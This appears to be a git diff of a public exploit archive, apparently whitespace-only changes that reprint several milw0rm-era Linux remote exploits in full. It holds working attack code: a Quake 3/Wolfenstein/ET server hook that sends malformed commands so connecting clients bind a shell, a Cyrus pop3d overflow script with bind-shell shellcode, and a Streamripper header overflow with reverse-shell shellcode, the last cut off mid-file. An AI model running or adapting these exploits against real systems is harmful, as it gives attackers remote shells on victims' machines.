"\x0b\x58\x68\x2f\x68\x48\x78\x79\x69\x58\x05\x01\x01\x7f\x01\x50\x68" - "\x3e\x57\x50\x01\x58\x05\x01\x01\x7d\x7f\x50\x68\x75\x1c\x59\x6a\x68" - "\x50\x01\x48\x40\x58\x66\x05\x7d\x7f\x50\x68\x5b\x6a\x02\x58\x68\x7f" - "\x50\x53\x58\x58\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01" - "\x7d\x50\x68\x57\x54\x59\x43\x68\x7f\x5f\x50\x50\x58\x66\x40\x50\x68" - "\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x7f\x6a\x04\x5b\x58" - "\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x51" - "\x50\x54\x59\x68\x45\x55\x6a\x10\x68\x5b\x0e\x50\x44\x58\x05\x02\x01" - "\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01" - "\x58\x05\x01\x01\x7d\x7f\x50\x68\x52\x53\x6a\x02\x68\x4a\x6a\x01\x5b" - "\x68\x58\x6a\x01\x5a\x68\x07\x50\x6a\x66\x58\x66\x05\x01\x73\x50\x68" - "\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM" - "\x68\x40\x74\x0f\x68\x68\x57\x50\x7f\x47\x58\x05\x01\x7d\x01\x01\x50" - "\x68\x41\x41\x6a\x02\x74\x0c\x75\x0a"; - -void __attribute__ ((constructor)) init (void) { - char buf[256]; - int ret; - - printf("remap_this.c by landser - landser at hotmail.co.il\n\n"); - - ret = readlink("/proc/self/exe", buf, sizeof buf); - if (ret < 0) { - perror("readlink()"); - exit(EXIT_FAILURE); - } - buf[ret] = '\0'; - - for (c=0;c> (8*i)) & 0xff; - - if ((b-1) >= 0x7f) { - cm1[i] = 0x6b; - cm2[i] = b - 0x6b; - } - else { - cm1[i] = b - 1; - cm2[i] = 1; - } - } - - ptr = strstr(ptr, "PORT"); - if (!ptr) abort(); - memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32 - memcpy(ptr+2, &port, sizeof port); - - ptr = strstr(ptr, "ERRM"); - if (!ptr) abort(); - memcpy(ptr, &games[c].errormsg, 4); - - strcat(ptr, "\""); - if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w"); -} - -#define PAGE(x) (void *)((unsigned long)x & 0xfffff000) - -static void *hook (void *hfunc, int len, void *wfunc) { - void *newmem = malloc(len+5); - long rel32; - - // copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction 
after it
- memcpy(newmem, hfunc, len);
- memset(newmem+len, 0xe9, 1); // e9 - jmp rel32
- rel32 = hfunc - (newmem+5);
- memcpy(newmem+len+1, &rel32, sizeof rel32);
-
- // make 'hfunc's address writable & executable
- mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
-
- // change the start of 'hfunc' to a 'jmp *wfunc' instruction
- memset(hfunc, 0xe9, 1); // e9 - jmp rel32
- rel32 = wfunc - (hfunc+5);
- memcpy(hfunc+1, &rel32, sizeof rel32);
-
- return newmem;
-}
-
-// milw0rm.com [2006-05-05]
+// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit
+// by landser - landser at hotmail.co.il
+//
+// this code works as a preloaded shared library on a game server,
+// it hooks two functions on the running server:
+// svc_directconnect() that is called when a client connects,
+// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients.
+// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message.
+//
+// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro)
+// (win32 clients are vuln too but not included here)
+//
+// usage:
+// gcc remap_this.c -shared -fPIC -o remap_this.so
+// and run a server with env LD_PRELOAD="./remap_this.so"
+//
+// -----------------------------------------------------
+// [luser@box ~/wolfenstein]$ LD_PRELOAD="./remap_this.so" ./wolfded.x86 +set net_port 5678 +map mp_beach
+// remap_this.c by landser - landser at hotmail.co.il
+//
+// game: RtCW 1.41 Dedicated.
+// [...]
+// directconnect(): 10.0.0.4 connected
+// sendservercommand() called
+// sendservercommand() called
+// sendservercommand() called
+// [...]
+// [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv
+// sus4 [10.0.0.4] 27670 (?) 
open
+// id
+// uid=1000(luser) gid=100(lusers)
+// -----------------------------------------------------
+//
+// visit www.nixcoders.org for open source linux cheats
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define SILENT // hide the crappy server output
+#define PORT 27670 // bindshell port. some values are invalid
+
+struct netaddr { // from q3-1.32b/qcommon/qcommon.h
+ int type;
+ unsigned char ip[4];
+ unsigned char ipx[10];
+ unsigned short port;
+};
+
+struct {
+ char *name;
+ char *fn;
+ unsigned long retaddr; // something that jumps to %esp
+ unsigned long sendservercommand; // address of sv_sendservercommand()
+ unsigned long directconnect; // address of svc_directconnect()
+ int hooklen; // for both sendservercommand and directconnect
+ unsigned long errormsg; // address of error string
+ unsigned long comerror; // address of com_error()
+ int popas; // num of popa instructions before shellcode
+ int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction
+} games[] = {
+ {"ET 2.60 Dedicated", "etded",
+ 0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12},
+ {"RtCW 1.41 Dedicated", "wolfded",
+ 0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12},
+ {"Quake 3 1.32b Dedicated", "q3ded",
+ 0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27},
+};
+
+const int ngames = sizeof(games) / sizeof(games[0]);
+const unsigned short int port = PORT;
+
+static void *hook (void *, int, void *);
+static void sendservercommand (void *, const char *, ...);
+static void directconnect (struct netaddr);
+static void writebuf (void);
+
+void (*_sendservercommand)(void *, const char *, ...);
+void (*_directconnect)(struct netaddr);
+
+int c = -1;
+unsigned char buf[1024];
+
+// shellcode (286 bytes):
+// fork()s,
+// the parent proc calls com_error() with an error message (errormsg var),
+// the child proc binds a shell on a chosen port
+// unallowed 
chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80
+unsigned char sc[] =
+ "\x68\x03\x5a\x70\x50\x58\x05\x01\x01\x7b\x71\x50\x68\x57\x50\x7f\x69"
+ "\x58\x05\x01\x7d\x01\x01\x50\x68\x70\x30\x6a\x06\x58\x66\x05\x7b\x76"
+ "\x50\x68\x54\x5b\x52\x53\x68\x2f\x62\x69\x6e\x68\x2f\x73\x68\x68\x68"
+ "\x0b\x58\x68\x2f\x68\x48\x78\x79\x69\x58\x05\x01\x01\x7f\x01\x50\x68"
+ "\x3e\x57\x50\x01\x58\x05\x01\x01\x7d\x7f\x50\x68\x75\x1c\x59\x6a\x68"
+ "\x50\x01\x48\x40\x58\x66\x05\x7d\x7f\x50\x68\x5b\x6a\x02\x58\x68\x7f"
+ "\x50\x53\x58\x58\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01"
+ "\x7d\x50\x68\x57\x54\x59\x43\x68\x7f\x5f\x50\x50\x58\x66\x40\x50\x68"
+ "\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x7f\x6a\x04\x5b\x58"
+ "\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x51"
+ "\x50\x54\x59\x68\x45\x55\x6a\x10\x68\x5b\x0e\x50\x44\x58\x05\x02\x01"
+ "\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01"
+ "\x58\x05\x01\x01\x7d\x7f\x50\x68\x52\x53\x6a\x02\x68\x4a\x6a\x01\x5b"
+ "\x68\x58\x6a\x01\x5a\x68\x07\x50\x6a\x66\x58\x66\x05\x01\x73\x50\x68"
+ "\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM"
+ "\x68\x40\x74\x0f\x68\x68\x57\x50\x7f\x47\x58\x05\x01\x7d\x01\x01\x50"
+ "\x68\x41\x41\x6a\x02\x74\x0c\x75\x0a";
+
+void __attribute__ ((constructor)) init (void) {
+ char buf[256];
+ int ret;
+
+ printf("remap_this.c by landser - landser at hotmail.co.il\n\n");
+
+ ret = readlink("/proc/self/exe", buf, sizeof buf);
+ if (ret < 0) {
+ perror("readlink()");
+ exit(EXIT_FAILURE);
+ }
+ buf[ret] = '\0';
+
+ for (c=0;c> (8*i)) & 0xff;
+
+ if ((b-1) >= 0x7f) {
+ cm1[i] = 0x6b;
+ cm2[i] = b - 0x6b;
+ }
+ else {
+ cm1[i] = b - 1;
+ cm2[i] = 1;
+ }
+ }
+
+ ptr = strstr(ptr, "PORT");
+ if (!ptr) abort();
+ memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32
+ memcpy(ptr+2, &port, sizeof port);
+
+ ptr = strstr(ptr, "ERRM");
+ if (!ptr) abort();
+ memcpy(ptr, &games[c].errormsg, 4);
+
+ strcat(ptr, "\"");
+ if (!strstr(games[c].name, "Quake")) 
strcat(ptr, " j w");
+}
+
+#define PAGE(x) (void *)((unsigned long)x & 0xfffff000)
+
+static void *hook (void *hfunc, int len, void *wfunc) {
+ void *newmem = malloc(len+5);
+ long rel32;
+
+ // copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it
+ memcpy(newmem, hfunc, len);
+ memset(newmem+len, 0xe9, 1); // e9 - jmp rel32
+ rel32 = hfunc - (newmem+5);
+ memcpy(newmem+len+1, &rel32, sizeof rel32);
+
+ // make 'hfunc's address writable & executable
+ mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
+
+ // change the start of 'hfunc' to a 'jmp *wfunc' instruction
+ memset(hfunc, 0xe9, 1); // e9 - jmp rel32
+ rel32 = wfunc - (hfunc+5);
+ memcpy(hfunc+1, &rel32, sizeof rel32);
+
+ return newmem;
+}
+
+// milw0rm.com [2006-05-05]
diff --git a/platforms/linux/remote/181.c b/platforms/linux/remote/181.c
index 5c59329d3..e8e825435 100755
--- a/platforms/linux/remote/181.c
+++ b/platforms/linux/remote/181.c
@@ -385,6 +385,6 @@ main(int argc, char **argv)
 }
 assembly_shell_code(sock, addr, port, laddr, linfo);
-}
-
-// milw0rm.com [2000-11-16]
+}
+
+// milw0rm.com [2000-11-16]
diff --git a/platforms/linux/remote/2185.pl b/platforms/linux/remote/2185.pl
index 93b9ff6d5..47606f224 100755
--- a/platforms/linux/remote/2185.pl
+++ b/platforms/linux/remote/2185.pl
@@ -1,62 +1,62 @@
-#!/usr/bin/perl
-## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
-## Name: bid-18056.pl
-## Date: 08/12/2006
-##
-## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
-## exploits and not either of them worked (not that they don't but coding my own is generaly faster
-## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
-## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
-## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
-## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
-## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
-## done here is used the same method, yet found a data area that is not going to freak pop3d
-## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
-## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
-##
-## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
-## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
-## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
-## shellcode (because it'll segfault and won't get executed). 
-##
-## Note: bindport is 13370
-#################################################################################################################
-use IO::Socket;
-use strict;
-
-my $host = $ARGV[0] || help();
-my $offset = $ARGV[1] || help();
-my $port = 110;
-
-# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
-# metasploit sc to work (as usualy, hmph)
-my $shellcode =
-"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96".
-"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56".
-"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1".
-"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0".
-"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53".
-"\x89\xe1\xcd\x80";
-
-my $sock = IO::Socket::INET->new('PeerAddr' => $host,
- 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");
-
-$sock->autoflush();
-
-print $sock "USER "; ## begin USER command with just that
-print $sock "$shellcode"; ## shellcode is *userbuf is *user
-print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
-print $sock "\n"; ## that simple
-
-sub help {
- print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
- print "08/12/2006\n\n";
- print "perl $0 \$host \$offset\n\n";
-
- print "Offsets: \n";
- print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";
-
- exit(0);
-}
-
-# milw0rm.com [2006-08-14]
+#!/usr/bin/perl
+## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
+## Name: bid-18056.pl
+## Date: 08/12/2006
+##
+## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
+## exploits and not either of them worked (not that they don't but coding my own is generaly faster
+## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
+## unlucky and missed the offset in between the 5 runs i gave it. 
The one from bannedit was interesting...
+## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
+## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
+## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
+## done here is used the same method, yet found a data area that is not going to freak pop3d
+## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
+## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
+##
+## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
+## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
+## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
+## shellcode (because it'll segfault and won't get executed).
+##
+## Note: bindport is 13370
+#################################################################################################################
+use IO::Socket;
+use strict;
+
+my $host = $ARGV[0] || help();
+my $offset = $ARGV[1] || help();
+my $port = 110;
+
+# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
+# metasploit sc to work (as usualy, hmph)
+my $shellcode =
+"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96".
+"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56".
+"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1".
+"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0".
+"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53". 
+"\x89\xe1\xcd\x80"; + +my $sock = IO::Socket::INET->new('PeerAddr' => $host, + 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n"); + +$sock->autoflush(); + +print $sock "USER "; ## begin USER command with just that +print $sock "$shellcode"; ## shellcode is *userbuf is *user +print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out +print $sock "\n"; ## that simple + +sub help { + print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n"; + print "08/12/2006\n\n"; + print "perl $0 \$host \$offset\n\n"; + + print "Offsets: \n"; + print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n"; + + exit(0); +} + +# milw0rm.com [2006-08-14] diff --git a/platforms/linux/remote/220.c b/platforms/linux/remote/220.c index 8f71c591c..8e2b5ae13 100755 --- a/platforms/linux/remote/220.c +++ b/platforms/linux/remote/220.c @@ -312,6 +312,6 @@ calculate_precision (unsigned int addr_byte, int already_written_init) already_written = addr_byte; return tmp; } - - -// milw0rm.com [2000-12-06] + + +// milw0rm.com [2000-12-06] diff --git a/platforms/linux/remote/225.c b/platforms/linux/remote/225.c index dbb5a1b41..e4dd25ab9 100755 --- a/platforms/linux/remote/225.c +++ b/platforms/linux/remote/225.c @@ -221,6 +221,6 @@ _exit(-1073743151) = ? tshaw:~# */ - - -// milw0rm.com [2000-12-11] + + +// milw0rm.com [2000-12-11] diff --git a/platforms/linux/remote/226.c b/platforms/linux/remote/226.c index d9cf5c0a3..33044f8cc 100755 --- a/platforms/linux/remote/226.c +++ b/platforms/linux/remote/226.c @@ -87,6 +87,6 @@ int main(int argc, char** argv) { printf("%s", buffer); putchar('\n'); } - - -// milw0rm.com [2000-12-11] + + +// milw0rm.com [2000-12-11] diff --git a/platforms/linux/remote/227.c b/platforms/linux/remote/227.c index 475eed5fe..2884184d3 100755 --- a/platforms/linux/remote/227.c +++ b/platforms/linux/remote/227.c 
@@ -433,6 +433,6 @@ else return (-1); }
-
-
-// milw0rm.com [2000-12-11]
+
+
+// milw0rm.com [2000-12-11]
diff --git a/platforms/linux/remote/2274.c b/platforms/linux/remote/2274.c
index c5a4f9b69..0bf7e4e98 100755
--- a/platforms/linux/remote/2274.c
+++ b/platforms/linux/remote/2274.c
@@ -1,276 +1,276 @@ -/* - _______ ________ .__ _____ __ -___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ -\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / - > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < -/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ - \/ \/ \/ \/ 29\08\06 \/ |__| \/ \/ - - * mm. dM8 - * YMMMb. dMM8 _____________________________________ - * YMMMMb dMMM' [ ] - * `YMMMb dMMMP [ There are doors I have yet to open ] - * `YMMM MMM' [ windows I have yet to look through ] - * "MbdMP [ Going forward may not be the answer ] - * .dMMMMMM.P [ ] - * dMM MMMMMM [ maybe I should go back ] - * 8MMMMMMMMMMI [_____________________________________] - * YMMMMMMMMM www.netbunny.org - * "MMMMMMP - * MxM .mmm - * W"W """ - -[i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit -[i] Discovered by: Ulf Harnhammar -[i] Exploit by: Expanders -[i] References: http://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ -[i] Greatings: x0n3-h4ck - netbunny - my girlfriend..thanks for existing - -[ Why streamripper crash? ] - -Streamripper like any other shoutcast client send an HTTP GET request to the stream server then receive a pseudo-HTTP response. -Response is made of a ICY [CODE] that show the status of the remote daemon, and a few icy- headers that stores radio informations -like Title - Website - Genre - Bitrate and a special header for song-title offset in the content stream. - -in lib/http.c [httplib_parse_sc_header()] - -[code segment] -.... -char stempbr[50]; -.... -rc = extract_header_value(header, stempbr, "icy-br:"); -.... -[/code segment] - -extract_header_value(...) calls subnstr_until(const char *str, char *until, char *newstr, int maxlen) that copies from [*str] to [*newstr] trimming -everything next [*until] for a maximum of [maxlen] bytes. - -in streamripper-1.61.25 ( maybe prior versions ) MAX_ICY_STRING costant is passed as [maxlen]. 
-
-in lib/lib/srtypes.h
-
-#define MAX_ICY_STRING 4024
-
-Putting all together if we send an icy-br: header 156 byte long we reach EIP overwriting.
-
-Code Execution is obvious possible.
-
-[ Timeline ]
-
-Vendor has been informed and version 1.61.26 has been released.
-
-[ Notes ]
-
-Exploit uses shitty hardcoded adresses, there's no registers that point to an usefull location so virtual address exploiting isn't possible.
-Probably some better solution can be used but i'm really to lazy and busy to fuck my mind with that.
-
-[ Links ]
-
-www.x0n3-h4ck.org
-www.netbunny.org
-
-
-
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define BUFFSIZE 200 // Buffer size
-
-int banner();
-int usage(char *filename);
-int inject(char *port, char *ip);
-int remote_connect( char* ip, unsigned short port );
-
-
-/* linux_ia32_reverse - Size=70 Encoder=None( hahaha streaming has no restricted 0x00 ) http://metasploit.com */
-unsigned char shellcode[] =
- "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
- "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68"
- "\x00\x00\x00\x00" // IP
- "\x66\x68"
- "\x00\x00" // PORT
- "\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
- "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
- "\x89\xe1\xb0\x0b\xcd\x80";
-
-char http_header[] = "ICY 200 OK\r\n"
- "icy-notice1:
This stream requires Winamp
\r\n" - "icy-notice2:SHOUTcast Distributed Network Audio Server/unix v1.9.7
\r\n" - "icy-name:SEGFAULT radio\r\n" - "icy-genre:Progressive House\r\n" - "icy-url:http://www.x0n3-h4ck.org\r\n" - "content-type:audio/mpeg\r\n" - "icy-pub:1\r\n" - "icy-metaint:1\r\n" // mp3 metatags starts at first byte of content - "icy-br:"; // Finally here... - -char http_content[] = "\x0d\x0a\x0d\x0a" // \r\n\r\n - "\x04" // this magic byte can be used to control malloc(m_buffersize). m_buffersize is (this-byte * 16 ) TODO: egghunter - "\x53\x74\x72\x65\x61\x6D\x54\x69\x74\x6C\x65\x3D\x27\x45" - "\x78\x70\x61\x6E\x64\x65\x72\x73\x20\x2D\x20\x49\x27\x6C" - "\x6C\x20\x4F\x77\x6E\x20\x59\x6F\x75\x27\x3B\x53\x74\x72" - "\x65\x61\x6D\x55\x72\x6C\x3D\x27\x27\x3B\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00" - "\xd3\xff\xff\xf5\xff\xff\xf9\xaf\xff\xe5\x29\xbe\x3e\x8b\x18"; // a few bytes from an mp3 - - -struct retcodes{char *platform;unsigned long addr;} targets[]= { - { "Debian GNU/Linux testing/unstable" , 0xb7e70090 }, - { "Debian GNU/Linux 3.1", 0xb7e71070 }, - { "Crash daemon - DEBUGGING" , 0xdeadc0de }, - { NULL } -}; -int banner() { - printf("\n[i] Title: \tStreamripper HTTP Header Parsing BOF Exploit\n"); - printf("[i] Discovered by:\tUlf Harnhammar\n"); - printf("[i] Exploit by: \tExpanders\n\n"); - return 0; -} - -int usage(char *filename) { - int i; - printf("Usage: \t%s \n\n",filename); - printf(" \t : Local port for listener :: Default: 8000\n"); - printf(" \t : Local ip address for connectback\n"); - printf(" \t : Local port for connectback\n"); - printf(" \t : Target from the list below\n\n"); - - printf("# \t Address \t Target\n"); - printf("---------------------------------------------------------\n"); - for(i = 0; targets[i].platform; i++) - printf("%d \t 0x%08x \t %s \n",i,targets[i].addr,targets[i].platform); - printf("---------------------------------------------------------\n"); - exit(0); -} - -int inject(char *port, char *ip) -{ - unsigned long m_ip; - unsigned short m_port; - m_ip = inet_addr(ip); - m_port = htons(atoi( port )); - 
memcpy ( &shellcode[26], &m_ip, 4);
- memcpy ( &shellcode[32], &m_port, 2);
- return 0;
-}
-
-int socket_listen( unsigned short port )
-{
- int s,reuseaddr=1;
- struct sockaddr_in localaddr;
- struct hostent* host_addr;
-
- localaddr.sin_family = AF_INET;
- localaddr.sin_port = htons(port);
- localaddr.sin_addr.s_addr = INADDR_ANY;
- bzero(&(localaddr.sin_zero), 8);
-
- if ( ( s = socket(AF_INET, SOCK_STREAM, 0) ) < 0 )
- {
- printf ( "[X] socket() failed!\n" );
- exit ( 1 );
- }
- if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,(socklen_t)sizeof(reuseaddr)) < 0)
- {
- printf("[X] setsockopt() failed!\n");
- exit ( 1 );
- }
- if (bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0)
- {
- perror("[X] bind() failed\n");
- exit ( 1 );
- }
- if (listen(s, 1) < 0)
- {
- perror("[X] listen() failed\n");
- exit ( 1 );
- }
- return ( s );
-}
-
-int client_accept( int listener )
-{
- int s;
- struct sockaddr_in remoteaddr;
- int addrlen = sizeof(struct sockaddr_in);
- if ((s = accept(listener, (struct sockaddr *)&remoteaddr, &addrlen)) < 0)
- {
- perror("[X] accept() failed\n");
- exit ( 1 );
- }
- if (getpeername(s, (struct sockaddr *)&remoteaddr, &addrlen) < 0)
- {
- perror("[X] getpeername() failed\n");
- exit ( 1 );
- }
- printf("got connection from %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));
- return ( s );
-}
-
-
-int main(int argc, char *argv[]) {
- int listener,client,position=0;
- unsigned int rcv;
- char buffer[BUFFSIZE],*request;
- char recvbuf[256];
- banner();
- if( (argc != 5) || (atoi(argv[1]) < 1) || (atoi(argv[1]) > 65534) )
- usage(argv[0]);
-
- printf("[+] Creating evil buffer\n");
- request = (char *) malloc(BUFFSIZE + strlen(http_header) + strlen(http_content)); // +3 == \r + \n + 0x00
- memset(buffer,0x90,BUFFSIZE); // Fill with nops
-
- inject(argv[3],argv[2]); // Xor port and ip and put them into the shellcode
-
- position = 156 - strlen(shellcode); // 156 : EIP offset
- 
memcpy(buffer+position,shellcode,strlen(shellcode)); - position += strlen(shellcode); - memcpy(buffer+position,&targets[atoi(argv[4])].addr,4); - position += 4; - memset(buffer+position,0x00,1); // End - sprintf(request,"%s%s%s",http_header,buffer,http_content); - - printf("[+] Setting up socket\n"); - listener = socket_listen(atoi(argv[1])); - - printf("[+] Waiting for client..."); - fflush(stdout); - client = client_accept(listener); - - printf("[+] Receiving GET request..."); - fflush(stdout); - rcv=recv(client,recvbuf,256,0); - if(rcv<0) - { - printf("\n[X] Error while recieving banner!\n"); - close(client); - close(listener); - exit( 1 ); - } - if (strstr(recvbuf,"1.61.25")!=0) - { - sleep(1); - printf("ok\n[+] Sending %d bytes of painfull buffer\n",strlen(request)); - if ( send ( client, request, strlen (request), 0) <= 0 ) - { - printf("[X] Failed to send buffer\n"); - exit ( 1 ); - } - printf("[+] Done - Wait for shell on port %s\n",argv[3]); - } else - printf("[X] This client is not running Streamripper or it's an unsupported version\n"); - close(client); - close(listener); - free(request); - return 0; -} - -// milw0rm.com [2006-08-29] +/* + _______ ________ .__ _____ __ +___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ +\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / + > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < +/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ + \/ \/ \/ \/ 29\08\06 \/ |__| \/ \/ + + * mm. dM8 + * YMMMb. 
dMM8 _____________________________________ + * YMMMMb dMMM' [ ] + * `YMMMb dMMMP [ There are doors I have yet to open ] + * `YMMM MMM' [ windows I have yet to look through ] + * "MbdMP [ Going forward may not be the answer ] + * .dMMMMMM.P [ ] + * dMM MMMMMM [ maybe I should go back ] + * 8MMMMMMMMMMI [_____________________________________] + * YMMMMMMMMM www.netbunny.org + * "MMMMMMP + * MxM .mmm + * W"W """ + +[i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit +[i] Discovered by: Ulf Harnhammar +[i] Exploit by: Expanders +[i] References: http://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ +[i] Greatings: x0n3-h4ck - netbunny - my girlfriend..thanks for existing + +[ Why streamripper crash? ] + +Streamripper like any other shoutcast client send an HTTP GET request to the stream server then receive a pseudo-HTTP response. +Response is made of a ICY [CODE] that show the status of the remote daemon, and a few icy- headers that stores radio informations +like Title - Website - Genre - Bitrate and a special header for song-title offset in the content stream. + +in lib/http.c [httplib_parse_sc_header()] + +[code segment] +.... +char stempbr[50]; +.... +rc = extract_header_value(header, stempbr, "icy-br:"); +.... +[/code segment] + +extract_header_value(...) calls subnstr_until(const char *str, char *until, char *newstr, int maxlen) that copies from [*str] to [*newstr] trimming +everything next [*until] for a maximum of [maxlen] bytes. + +in streamripper-1.61.25 ( maybe prior versions ) MAX_ICY_STRING costant is passed as [maxlen]. + +in lib/lib/srtypes.h + +#define MAX_ICY_STRING 4024 + +Putting all together if we send an icy-br: header 156 byte long we reach EIP overwriting. + +Code Execution is obvious possible. + +[ Timeline ] + +Vendor has been informed and version 1.61.26 has been released. 
+
+[ Notes ]
+
+Exploit uses shitty hardcoded adresses, there's no registers that point to an usefull location so virtual address exploiting isn't possible.
+Probably some better solution can be used but i'm really to lazy and busy to fuck my mind with that.
+
+[ Links ]
+
+www.x0n3-h4ck.org
+www.netbunny.org
+
+
+
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define BUFFSIZE 200 // Buffer size
+
+int banner();
+int usage(char *filename);
+int inject(char *port, char *ip);
+int remote_connect( char* ip, unsigned short port );
+
+
+/* linux_ia32_reverse - Size=70 Encoder=None( hahaha streaming has no restricted 0x00 ) http://metasploit.com */
+unsigned char shellcode[] =
+ "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
+ "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68"
+ "\x00\x00\x00\x00" // IP
+ "\x66\x68"
+ "\x00\x00" // PORT
